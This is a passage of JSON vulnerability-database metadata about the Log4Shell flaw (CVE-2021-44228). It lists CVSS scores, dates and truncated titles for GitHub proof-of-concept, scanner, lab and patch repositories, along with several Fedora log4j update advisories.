"MEDIUM", "confidentialityImpact": "COMPLETE", 
"availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-28T08:39:10", "id": "D1E393B9-589D-5A20-8799-0F762FD361DA", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-14T20:09:51", "description": "# CVE-2021-44228\nhttps://nvd.nist.gov/vuln/detail/CVE-2021-44228...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-12-13T00:14:45", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-14T19:46:05", "id": "547FC254-3B26-59EC-AF4D-E5954678AC3D", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-22T23:15:39", "description": "# Log4J (CVE-2021-44...", "cvss3": 
{"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-12T21:52:53", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-22T16:23:31", "id": "0D4B651A-4424-55FE-B496-1BB733DE7EE2", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-18T02:14:17", "description": "# JndiLookup\nSome tool to help analyzing Apache Log4j 2 CVE-2021...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-13T14:22:34", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", 
"cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-18T02:12:49", "id": "7B2DA44B-D36F-56A4-B4D8-376B8D2F5586", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-21T02:10:46", "description": "# \u2615 ITF-log4shell-vulnapp\n\nlog4j (CVE-2021-44228) Spring-boot we...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-14T08:21:11", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-20T07:12:38", 
"id": "75876A50-BD9B-5991-9E42-7A343A97C890", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-05-08T21:09:00", "description": "# log4shell-rmi-poc\nA Proof of Concept of the Log4j vulnerabilit...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-19T17:53:31", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-05-08T15:07:19", "id": "61AC9232-A772-5D63-9DFC-BFE4976418C7", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-04-23T06:53:54", "description": "<img src=\"logo.png\" width=\"400\">\n\n# \ud83d\udd0d Log4JShell Bytecode Detect...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, 
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-12T11:28:34", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-04-23T02:10:51", "id": "553C3CC1-0126-5554-8BE0-5F577271EBF9", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-30T16:31:40", "description": "# mc-log4j-patcher\n\nReplaces old (vulnerable - CVE-2021-44228) L...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-10T19:25:31", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": 
"COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-30T10:17:28", "id": "6F10C51B-BF15-522B-B1CB-BA95361D556E", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-15T14:07:27", "description": "# Exploit the Log4j / CVE-2021-44228 vulnerability (PoC soon...)...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-12-14T20:12:07", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-14T22:55:10", "id": "817FB04E-AFFE-567B-8A2C-64C0A8923734", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-14T17:15:05", "description": "# Sample Log4j2 vulnerable application (CVE-2021-44228) \n# Versi...", "cvss3": 
{"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-12-12T13:00:38", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-13T04:00:49", "id": "D813949A-183D-55ED-AF64-B130B8F95A56", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-01-05T17:12:07", "description": "# Log4Shell docker lab for CVE-2021-44228\n\n## The components\nThi...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-18T19:30:35", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", 
"cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-01-05T14:55:14", "id": "B32ED3B3-2054-5776-B952-907BE2CBEED6", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-01-07T14:15:08", "description": "# Ansible role - log4shell\n[\n\n RASP for CVE-2021-44228 (**fo...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-21T13:30:37", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-01-10T11:47:39", "id": 
"F594470D-2599-5B2E-B317-C9720581C07D", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-15T14:08:10", "description": "# Security Log4J Tester\n\nA vulnerability in Apache Log4j, a wide...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-12-14T14:46:08", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-14T15:04:49", "id": "C45EBEA7-DE2F-5373-9AA5-334E20EA2D23", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-15T11:15:49", "description": "# CVE-2021-44228 Spring Boot Test Service\nThis is a dirty hack s...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": 
"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-12-13T13:05:26", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-15T10:01:39", "id": "5B6C990F-05A3-5D83-83DF-386A34FB8560", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-02-10T00:00:00", "description": "# cve-2021-44228-qingteng-online-patch \n\n## What is this\n\nHot-pa...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-12T15:30:55", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", 
"baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-02-07T10:44:22", "id": "8D0CF3A6-EC3F-536C-A424-08879FF2F158", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-14T17:16:34", "description": "# CVE-2021-44228 Remote Code Injection In Log4j\n\n\n```\n <d...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-12-10T07:18:15", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-12T03:47:13", "id": "97D358EF-90F6-5D12-981B-DAFEB56F784F", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-16T17:14:26", "description": "# log4jScan\nsimple python scanner to check if your network is vu...", "cvss3": {"exploitabilityScore": 3.9, 
"cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-12-13T10:59:50", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-16T15:08:45", "id": "2E7FF2D4-97E7-54F5-A5C8-EACD22FCF303", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}], "fedora": [{"lastseen": "2021-12-14T17:05:10", "description": "Log4j is a tool to help the programmer output log statements to a variety of output targets. 
", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-12-13T17:13:00", "type": "fedora", "title": "[SECURITY] Fedora 35 Update: log4j-2.15.0-1.fc35", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-13T17:13:00", "id": "FEDORA:59AA230A7074", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/VU57UJDCFIASIO35GC55JMKSRXJMCDFM/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-23T00:53:13", "description": "Log4j is a tool to help the programmer output log statements to a variety of output targets. 
", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-22T01:14:26", "type": "fedora", "title": "[SECURITY] Fedora 34 Update: log4j-2.16.0-1.fc34", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-22T01:14:26", "id": "FEDORA:A5A703103140", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/AWKZIIRNESRPVUVBP7NGANPKUZN54Q23/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-23T00:53:13", "description": "Jansi is a small java library that allows you to use ANSI escape sequences in your Java console applications. It implements ANSI support on platforms which don't support it like Windows and provides graceful degradation for when output is being sent to output devices which cannot support ANSI seque nces. 
", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-22T01:14:26", "type": "fedora", "title": "[SECURITY] Fedora 34 Update: jansi-2.1.1-4.fc34", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-22T01:14:26", "id": "FEDORA:548FD3102AB0", "href": 